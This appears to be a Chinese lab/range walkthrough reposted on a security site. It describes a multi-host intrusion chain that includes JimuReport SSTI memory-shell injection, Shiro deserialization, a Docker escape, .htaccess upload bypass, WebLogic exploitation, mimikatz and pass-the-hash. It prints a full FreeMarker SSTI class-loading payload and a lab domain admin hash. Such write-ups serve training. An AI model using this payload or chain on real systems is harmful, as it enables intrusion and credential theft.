无限安全靶场-月挑战1

admin 2024年12月7日15:50:40评论23 views字数 2369阅读7分53秒阅读模式

环境:https://mp.weixin.qq.com/s/QokEYAqUfEaXxpbrqvr3uA

10.10.0.3-入口

无限安全靶场-月挑战1

发现数据库弱口令,还有两个 web 站,DocToolkit 在长城杯时候碰到过,有个 shiro 反序列化的洞

Mysql 登录发现了找到jeecg的信息

无限安全靶场-月挑战1
无限安全靶场-月挑战1

探测发现存在多个漏洞

无限安全靶场-月挑战1

积木报表 SSTI

执行命令

无限安全靶场-月挑战1

使用工具注入内存马失败

无限安全靶场-月挑战1

手工注入

无限安全靶场-月挑战1
{"sql":"call${"freemarker.template.utility.ObjectConstructor"?new()("javax.script.ScriptEngineManager").getEngineByName("js").eval("classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};")}","dbSource":"","type":"0"}

使用工具生成内存马替换

无限安全靶场-月挑战1
无限安全靶场-月挑战1

连接

无限安全靶场-月挑战1

信息收集一下,发现很多命令都没有

无限安全靶场-月挑战1

Shiro 反序列化

发现 DocToolkit 的源码,然后脱下来反编译

无限安全靶场-月挑战1

找到 shiro 秘钥

QZIysgMYhG7/CzIJlVpR1g==
无限安全靶场-月挑战1

成了

无限安全靶场-月挑战1
无限安全靶场-月挑战1

然后注入内存马

无限安全靶场-月挑战1
无限安全靶场-月挑战1

Docker 容器逃逸

信息收集是发现了点不对劲,猜测是在 docker 容器里

无限安全靶场-月挑战1

验证一下

查找.dockerenv文件

无限安全靶场-月挑战1

查询cgroup进程

无限安全靶场-月挑战1

查看容器环境变量

无限安全靶场-月挑战1

信息收集过程中发在貌似挂载了主机目录

无限安全靶场-月挑战1

写计划任务反弹 shell,这块一些莫名其妙的原因没成功,所以换个思路

使用 vshell 直接搭建隧道

下载文件

无限安全靶场-月挑战1
无限安全靶场-月挑战1

给权限执行

无限安全靶场-月挑战1
无限安全靶场-月挑战1

成功拿下主机,信息收集一波

无限安全靶场-月挑战1
无限安全靶场-月挑战1

192.168.80.55-文件上传

搭建个 socks 代理

无限安全靶场-月挑战1
无限安全靶场-月挑战1

目录扫描扫到了 up. php

无限安全靶场-月挑战1
无限安全靶场-月挑战1

构造文件上传的包

无限安全靶场-月挑战1

最后.htaccess文件解析绕过成功上传

无限安全靶场-月挑战1

结合刚开始扫到的路径构造,蚁剑连接

无限安全靶场-月挑战1

信息收集一下

有火绒

无限安全靶场-月挑战1

无域环境

无限安全靶场-月挑战1

双网卡,通向 192.168.81.0 网段

无限安全靶场-月挑战1

传个免杀是的 fscan 扫一下

无限安全靶场-月挑战1

不会 vshell 搭建二层代理,换 stowaway

无限安全靶场-月挑战1

192.168.81.22-weblogic

一把梭,打入内存马

无限安全靶场-月挑战1

信息收集一哈

无杀软

无限安全靶场-月挑战1

存在域环境  c3ting.org

无限安全靶场-月挑战1
无限安全靶场-月挑战1

抓个密码,用哥斯拉自带的 mimikatz

无限安全靶场-月挑战1

梳理一下

DC:192.168.77.250WIN-LAVRSND6J6N.c3ting.orgUsername : AdministratorDomain   : C3TINGNTLM     : 7ab183888ecafcccf897c4a5a59c8568SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9

192.168.77.250-域控

搭建隧道,做个 socks 代理,Pth成功拿下

无限安全靶场-月挑战1

隧道

无限安全靶场-月挑战1

参考

https://mp.weixin.qq.com/s/7EIw-k8GcL_HL4LzWOd56w

https://mp.weixin.qq.com/s/YOUnMVnvEsvTuLHQwOMs8Q

https://xz.aliyun.com/t/12495

原文始发于微信公众号(安服仔Yu9):无限安全靶场-月挑战1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月7日15:50:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   无限安全靶场-月挑战1http://cn-sec.com/archives/3479244.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息